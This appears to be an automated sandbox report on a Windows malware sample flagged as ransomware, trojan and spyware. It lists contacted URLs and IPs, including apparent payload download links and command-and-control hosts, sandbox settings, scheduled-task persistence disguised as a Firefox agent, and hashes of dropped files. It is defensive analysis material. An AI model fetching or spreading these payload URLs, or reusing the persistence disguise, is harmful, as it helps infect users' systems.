                                    http://furubujjul.net/true
                                    • URL Reputation: safe
                                    unknown
                                    https://api.2ip.ua/geo.jsonfalse
                                      high
                                      http://youyouumenia5.org/true
                                      • URL Reputation: safe
                                      unknown
                                      https://dldsystem.com/7.exefalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://guluiiiimnstra.net/true
                                      • URL Reputation: safe
                                      unknown
                                      http://aaa.apiaaaeg.com/check/safetrue
                                      • URL Reputation: safe
                                      unknown
                                      http://aaa.apiaaaeg.com/check/?sid=63737&key=7ab3af34ad464188e35d31bab8ff7aaetrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://www.facebook.com/ads/manager/account_settings/account_billingfalse
                                        high
                                        https://pelegisr.com/upload/ChromeSetup.exefalse
                                        • URL Reputation: safe
                                        unknown
                                        http://aaa.apiaaaeg.com/check/?sid=63657&key=0e7c4366e2f6f45645238b06b04781adtrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://duckduckgo.com/chrome_newtab956C.tmp.14.drfalse
                                          high
                                          https://static.xx.fbcdn.net/TT8C19.exe, 0000000A.00000003.547702633.00000000005F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://duckduckgo.com/ac/?q=956C.tmp.14.drfalse
                                              high
                                              https://static.xx.fbcdn.net/rsrc.php/v3/yC/r/jQFlt4gyp9R.js?_nc_x=Ij3Wp8lg5Kz8C19.exe, 0000000A.00000003.535321425.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.548144466.000000000241B000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.530031259.00000000005F6000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.531748027.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://api.2ip.ua/geo.jsonE=6246.exe, 00000008.00000002.537866043.0000000000807000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://static.xx.fbcdn.net/rsrc.php/v3/yS/r/V_wJ8EQu-vo.js?_nc_x=Ij3Wp8lg5Kz8C19.exe, 0000000A.00000003.535321425.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.548144466.000000000241B000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.530031259.00000000005F6000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.531748027.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://messenger.com/8C19.exe, 0000000A.00000003.535321425.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.548144466.000000000241B000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.530031259.00000000005F6000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.531748027.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://aaa.apiaaaeg.com/check/?sid=63683&key=ea932dc463661e5cd554f4fd13e01a3awal8C19.exe, 0000000A.00000003.559756913.00000000023DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://aaa.apiaaaeg.com/check/?sid=63657&key=0e7c4366e2f6f45645238b06b04781adg8C19.exe, 0000000A.00000003.540505674.00000000023DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://search.yahoo.com?fr=crmas_sfpf956C.tmp.14.drfalse
                                                        high
                                                        https://static.xx.fbcdn.net/rsrc.php/v3/y_/l/08C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.534860765.00000000005EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://aaa.apiaaaeg.com/check/?sid=63683&key=ea932dc463661e5cd554f4fd13e01a3aal8C19.exe, 0000000A.00000003.559756913.00000000023DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://static.xx.fbcdn.net/rsrc.php/v3/ys/l/08C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.534860765.00000000005EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            http://aaa.apiaaaeg.com/8C19.exe, 0000000A.00000003.538167010.00000000023CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.openssl.org/support/faq.html6246.exe, 00000008.00000002.536320589.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                              high
                                                              https://static.xx.fbcdn.net/rsrc.php/v3/yo/l/08C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://static.xx.fbcdn.net/rsrc.php/v3i7M54/yK/l/en_US/7XFrsMZamvv.js?_nc_x=Ij3Wp8lg5Kz8C19.exe, 0000000A.00000003.535321425.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.548144466.000000000241B000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.530031259.00000000005F6000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.531748027.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error6246.exe, 00000004.00000002.535198991.0000000002260000.00000040.00001000.00020000.00000000.sdmp, 6246.exe, 00000008.00000000.525988864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 6246.exe, 00000008.00000000.501708099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 6246.exe, 00000008.00000002.536320589.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  low
                                                                  https://api.2ip.ua/geo.json~6246.exe, 00000008.00000002.537866043.0000000000807000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://static.xx.fbcdn.net/rsrc.php/v3/yi/l/08C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://static.xx.fbcdn.net/rsrc.php/v3/yX/r/lwJdNrJ0mJk.js?_nc_x=Ij3Wp8lg5Kz8C19.exe, 0000000A.00000003.535321425.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.548144466.000000000241B000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.530031259.00000000005F6000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.531748027.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://api.2ip.ua/geo.jsondll.6246.exe, 00000008.00000002.537866043.0000000000807000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://static.xx.fbcdn.net/8C19.exe, 0000000A.00000003.547702633.00000000005F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://static.xx.fbcdn.net/rsrc.php/v3/yG/l/08C19.exe, 0000000A.00000003.535321425.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.537958292.00000000023A9000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.535904111.00000000023A9000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.548144466.000000000241B000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.530031259.00000000005F6000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.531748027.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://static.xx.fbcdn.net/rsrc.php/v3/ye/r/_S6bZc2Nrqz.js?_nc_x=Ij3Wp8lg5Kz8C19.exe, 0000000A.00000003.535321425.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.548144466.000000000241B000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.530031259.00000000005F6000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.531748027.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000001.00000000.367799571.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.319113552.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.403304956.0000000000921000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://aaa.apiaaaeg.com/check/?sid=63657&key=0e7c4366e2f6f45645238b06b04781ad68C19.exe, 0000000A.00000003.540505674.00000000023DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://static.xx.fbcdn.net/rsrc.php/v3/yv/l/08C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.535596843.000000000237B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://aaa.apiaaaeg.com/check/?sid=63657&key=0e7c4366e2f6f45645238b06b04781ad18C19.exe, 0000000A.00000003.540505674.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.538423863.00000000023DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://api.2ip.ua/6246.exe, 00000008.00000002.537866043.0000000000807000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.ico956C.tmp.14.drfalse
                                                                                        high
                                                                                        https://static.xx.fbcdn.net/rsrc.php/v3/yg/r/l_dEElJiBCo.js?_nc_x=Ij3Wp8lg5Kz8C19.exe, 0000000A.00000003.535321425.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.548144466.000000000241B000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.530031259.00000000005F6000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.531748027.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=956C.tmp.14.drfalse
                                                                                            high
                                                                                            https://static.xx.fbcdn.net/rsrc.php/v3/yH/r/xXDOO3oMCfl.js?_nc_x=Ij3Wp8lg5Kz8C19.exe, 0000000A.00000003.533912561.00000000023CF000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.534957053.00000000023D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search956C.tmp.14.drfalse
                                                                                                high
                                                                                                https://api.2ip.ua/geo.jsong6246.exe, 00000008.00000002.537866043.0000000000807000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=956C.tmp.14.drfalse
                                                                                                    high
                                                                                                    https://static.xx.fbcdn.net/rsrc.php/v3/yb/l/08C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.535596843.000000000237B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://api.2ip.ua/fo6246.exe, 00000008.00000002.537866043.0000000000807000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://static.xx.fbcdn.net/ninstagram.8C19.exe, 0000000A.00000003.534860765.00000000005EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://static.xx.fbcdn.net/rsrc.php/v3/yk/l/08C19.exe, 0000000A.00000003.535321425.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.548144466.000000000241B000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.530031259.00000000005F6000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.531748027.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://ac.ecosia.org/autocomplete?q=956C.tmp.14.drfalse
                                                                                                              high
                                                                                                              https://search.yahoo.com?fr=crmas_sfp956C.tmp.14.drfalse
                                                                                                                high
                                                                                                                http://aaa.apiaaaeg.coaa.apiaaaeg.com/8C19.exe, 0000000A.00000003.540505674.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.559703582.00000000023D1000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.566523088.00000000023D1000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.543232930.00000000023DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                http://aaa.apiaaaeg.com/check/?sid=63683&key=ea932dc463661e5cd554f4fd13e01a3ag8C19.exe, 0000000A.00000003.566738501.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.559756913.00000000023DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://api.2ip.ua/geo.json16246.exe, 00000008.00000002.537866043.0000000000807000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://static.xx.fbcdn.net/rsrc.php/v3/yn/l/08C19.exe, 0000000A.00000003.535321425.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.548144466.000000000241B000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.530031259.00000000005F6000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.531748027.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://furubujjul.net/Mozilla/5.0explorer.exe, 0000000F.00000002.498010000.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.494090495.0000000000910000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    https://static.xx.fbcdn.net/rsrc.php/v3/yd/l/08C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.534860765.00000000005EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://static.xx.fbcdn.net/rsrc.php/v3/yO/r/pslzeMSEB_a.js?_nc_x=Ij3Wp8lg5Kz8C19.exe, 0000000A.00000003.533912561.00000000023CF000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.534957053.00000000023D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://api.2ip.ua/geo.jsonI6246.exe, 00000008.00000002.537866043.0000000000807000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://static.xx.fbcdn.net/rsrc.php/v3/yS/l/08C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.534860765.00000000005EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=956C.tmp.14.drfalse
                                                                                                                              high
                                                                                                                              https://static.xx.fbcdn.net/rsrc.php/v3/yS/r/nHDYRDL5JAA.js?_nc_x=Ij3Wp8lg5Kz8C19.exe, 0000000A.00000003.535321425.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.548144466.000000000241B000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.530031259.00000000005F6000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.531748027.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://static.xx.fbcdn.net/rsrc.php/v3/y8/r/_LkNZPqGRAz.js?_nc_x=Ij3Wp8lg5Kz8C19.exe, 0000000A.00000003.535321425.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.548144466.000000000241B000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.530031259.00000000005F6000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.531748027.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  • No. of IPs < 25%
                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                  • 75% < No. of IPs
                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                  104.21.93.30
                                                                                                                                  furubujjul.netUnited States
                                                                                                                                  13335CLOUDFLARENETUStrue
                                                                                                                                  31.13.92.36
                                                                                                                                  unknownIreland
                                                                                                                                  32934FACEBOOKUSfalse
                                                                                                                                  185.220.204.62
                                                                                                                                  pelegisr.comIsrael
                                                                                                                                  41436CLOUDWEBMANAGE-EUGBtrue
                                                                                                                                  140.82.121.3
                                                                                                                                  github.comUnited States
                                                                                                                                  36459GITHUBUSfalse
                                                                                                                                  162.144.15.231
                                                                                                                                  dldsystem.comUnited States
                                                                                                                                  46606UNIFIEDLAYER-AS-1UStrue
                                                                                                                                  34.91.216.49
                                                                                                                                  avtlsgosecure.comUnited States
                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                  162.0.217.254
                                                                                                                                  api.2ip.uaCanada
                                                                                                                                  35893ACPCAfalse
                                                                                                                                  185.174.137.174
                                                                                                                                  unknownRussian Federation
                                                                                                                                  50113SUPERSERVERSDATACENTERRUtrue
                                                                                                                                  157.240.20.35
                                                                                                                                  star-mini.c10r.facebook.comUnited States
                                                                                                                                  32934FACEBOOKUSfalse
                                                                                                                                  45.136.151.102
                                                                                                                                  aaa.apiaaaeg.comLatvia
                                                                                                                                  18978ENZUINC-UStrue
                                                                                                                                  IP
                                                                                                                                  192.168.2.1
                                                                                                                                  Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                                                                                  Analysis ID:724879
                                                                                                                                  Start date and time:2022-10-17 22:04:18 +02:00
                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                  Overall analysis duration:0h 12m 26s
                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                  Report type:light
                                                                                                                                  Sample file name:file.exe
                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                  Number of analysed new started processes analysed:21
                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                  Number of injected processes analysed:1
                                                                                                                                  Technologies:
                                                                                                                                  • HCA enabled
                                                                                                                                  • EGA enabled
                                                                                                                                  • HDC enabled
                                                                                                                                  • AMSI enabled
                                                                                                                                  Analysis Mode:default
                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                  Detection:MAL
                                                                                                                                  Classification:mal100.rans.troj.spyw.evad.winEXE@24/24@23/11
                                                                                                                                  EGA Information:
                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                  HDC Information:
                                                                                                                                  • Successful, ratio: 57.7% (good quality ratio 54.1%)
                                                                                                                                  • Quality average: 78.3%
                                                                                                                                  • Quality standard deviation: 29.1%
                                                                                                                                  HCA Information:
                                                                                                                                  • Successful, ratio: 97%
                                                                                                                                  • Number of executed functions: 0
                                                                                                                                  • Number of non-executed functions: 0
                                                                                                                                  Cookbook Comments:
                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                                                                                                  • HTTP Packets have been reduced
                                                                                                                                  • TCP Packets have been reduced to 100
                                                                                                                                  • Excluded IPs from analysis (whitelisted): 52.168.117.173, 20.189.173.21, 13.107.42.13
                                                                                                                                  • Excluded domains from analysis (whitelisted): l-0004.l-msedge.net, onedsblobprdeus16.eastus.cloudapp.azure.com, odc-web-brs.onedrive.akadns.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, odc-web-geo.onedrive.akadns.net, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, watson.telemetry.microsoft.com
                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                  TimeTypeDescription
                                                                                                                                  22:06:29Task SchedulerRun new task: Firefox Default Browser Agent 40D8CDDD622645CF path: C:\Users\user\AppData\Roaming\thduhcf
                                                                                                                                  22:07:01API Interceptor2x Sleep call for process: WerFault.exe modified
                                                                                                                                  22:07:04API Interceptor13x Sleep call for process: 8C19.exe modified
                                                                                                                                  22:07:12Task SchedulerRun new task: Firefox Default Browser Agent 62DC1AFC56E25B06 path: C:\Users\user\AppData\Roaming\idduhcf
                                                                                                                                  No context
                                                                                                                                  No context
                                                                                                                                  No context
                                                                                                                                  No context
                                                                                                                                  No context
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):65536
                                                                                                                                  Entropy (8bit):0.8205277954149528
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:96:MjFLPxQd8w9s+ZYNFoT7R7V6tpXIQcQEc6IcEmcw3d+HbHg/wW6HeaVOyc/8Ih4S:mZyYdA8HaMsejMs/u7svS274ItXu
                                                                                                                                  MD5:863B02A7566FA2576FB2D4E9CF781B01
                                                                                                                                  SHA1:5143DF3665D88EF9C1B49E54B363F31AD75BAB76
                                                                                                                                  SHA-256:E134249820A979514103D8A00BF9A5BC65CE6E4E650B39D79DB6B85C598B9C2D
                                                                                                                                  SHA-512:2EEEC988930BD1C08F9A166A5BE7D033B921F53BE2CCEF7B0159661195F79D0B0AE9A26A4EEF29F16AE57629DE56647871D05D3ACBDEE0D785A3E2B2BC7526BA
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.1.0.5.4.3.2.1.0.6.1.9.1.4.3.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.1.0.5.4.3.2.1.9.1.1.9.1.4.6.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.3.9.d.2.9.4.5.-.3.4.0.4.-.4.a.f.a.-.8.6.e.c.-.c.e.d.4.3.7.9.b.7.f.c.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.9.4.d.a.8.0.8.-.6.c.b.5.-.4.9.6.b.-.8.c.8.7.-.f.2.f.c.5.0.8.d.6.1.f.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.7.7.9.5...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.0.2.4.-.0.0.0.1.-.0.0.1.9.-.9.e.c.6.-.6.f.6.5.a.f.e.2.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.c.c.4.e.d.1.e.9.2.2.b.e.f.c.f.9.e.7.3.8.3.2.3.f.b.2.c.8.0.1.7.0.0.0.0.f.f.f.f.!.0.0.0.0.5.b.2.e.2.c.6.b.4.b.2.9.6.1.a.7.5.7.6.e.8.5.e.7.4.6.f.5.f.9.2.b.a.6.b.5.9.0.6.3.!.7.7.9.5...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.8././.0.1.:.
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):65536
                                                                                                                                  Entropy (8bit):0.8206350910213582
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:96:pHFc4w5geFYNFoT7R7V6tpXIQcQEc6IcEmcw3N+HbHg/wW6HeaVOyc/8Ih4lpNN4:JHJA8HaMsujMs/u7sGS274It3
                                                                                                                                  MD5:90639497C3547B3E09409840BDEFDE9F
                                                                                                                                  SHA1:8A16D5C4B5016C3922B613510FEAD5D056CA5B9C
                                                                                                                                  SHA-256:9B6A120477D9156ED4B35B55D93727FC3941AB6196E52299ED74D2162895E348
                                                                                                                                  SHA-512:72691B5FCF2A42612E721796290480E699DC38E744BE4F43DD484697D091A9525D5A48D43E0B384D4E4A39CA6FD3536A3E9DBB469A5EC4DAC8D877A544D4526F
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.1.0.5.4.3.2.1.0.9.4.6.5.7.0.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.1.0.5.4.3.2.1.9.5.8.7.2.0.7.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.4.4.0.7.7.1.7.-.b.3.1.e.-.4.1.7.9.-.8.f.b.6.-.a.5.7.f.9.6.a.f.1.6.c.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.8.4.f.2.0.0.f.-.4.9.c.2.-.4.c.8.8.-.a.b.3.a.-.8.6.5.f.4.8.b.8.e.8.e.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.8.3.7.D...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.8.c.-.0.0.0.1.-.0.0.1.9.-.7.f.f.5.-.5.c.6.6.a.f.e.2.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.9.f.a.5.b.6.d.c.1.9.5.1.e.b.1.d.9.9.7.1.3.5.7.1.9.2.8.2.3.7.6.0.0.0.0.f.f.f.f.!.0.0.0.0.5.b.2.e.2.c.6.b.4.b.2.9.6.1.a.7.5.7.6.e.8.5.e.7.4.6.f.5.f.9.2.b.a.6.b.5.9.0.6.3.!.8.3.7.D...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.8././.0.1.:.
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                  Category:dropped
